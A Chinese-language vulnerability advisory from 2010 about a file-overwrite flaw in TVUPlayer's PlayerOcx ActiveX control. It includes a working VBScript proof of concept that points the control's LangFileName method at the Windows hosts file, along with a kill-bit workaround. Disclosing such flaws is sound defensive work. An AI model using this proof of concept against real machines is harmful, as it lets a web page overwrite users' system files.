发布日期：2010-02-03
更新日期：2010-02-09

受影响系统：

TuvNetworks TVUPlayer 2.4.9 beta1[build 1797]

描述：

---

TVUPlayer是一款免费的网络电视软件。

TVUPlayer所安装的PlayerOcx控件没有正确地验证传送给LangFileName方式的调用参数，用户受骗访问了恶意网页并向该方式传送了特制参数就会导致覆盖系统上的任意非隐藏文件。

<*来源：Evdokimov Dmitriy
  
  链接：http://dsecrg.com/pages/vul/show.php?id=165
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx"
prototype = "Property Let LangFileName As String"
memberName = "LangFileName"
progid = "PlayerOcx.FormPlayer"
argCount = 1

arg1="C:\WINDOWS\system32\drivers\etc\hosts"

target.LangFileName = arg1

</script></job></package>

建议：

---

临时解决方法：

* 为clsid 18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8设置kill bit。

厂商补丁：

TuvNetworks
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.tvunetworks.com/

浏览次数：3609
严重程度：0（网友投票）